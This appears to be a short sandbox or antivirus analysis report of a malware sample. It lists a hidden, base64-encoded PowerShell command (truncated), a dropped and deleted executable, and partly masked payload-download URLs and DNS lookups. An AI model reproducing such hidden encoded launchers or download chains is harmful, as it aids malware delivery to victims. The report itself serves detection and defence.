Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABFAHUAcwBlAHcAbABrAHAAbAB5AGEAcwA9ACcAUgB0AHcAZABhAGgAZwB1AGIAZABtAHIAeAAnADsAJABXAG8AbgBiAGYAeABnAHgAagByAHYAIAA9ACAAJwA4ADMAMgAnADsAJABOAG0AYgBxAGEAbgBkAGk...
Modifies file system
Creates the following files
- %HOMEPATH%\832.exe
Deletes the following files
- %HOMEPATH%\832.exe
Network activity
Connects to
- 'ca##uje.cn':443
TCP
HTTP GET requests
- http://se####curacao.com/engl/N/
- http://mo#####onsnellville.com/wp-content/vimeography/zcn/
- http://ne#####ndvietnam.com/wp-includes/ivpeum/
- http://br####eadbar.com/sitemap/phr/
UDP
- DNS ASK se####curacao.com
- DNS ASK mo#####onsnellville.com
- DNS ASK ne#####ndvietnam.com
- DNS ASK br####eadbar.com
- DNS ASK ca##uje.cn
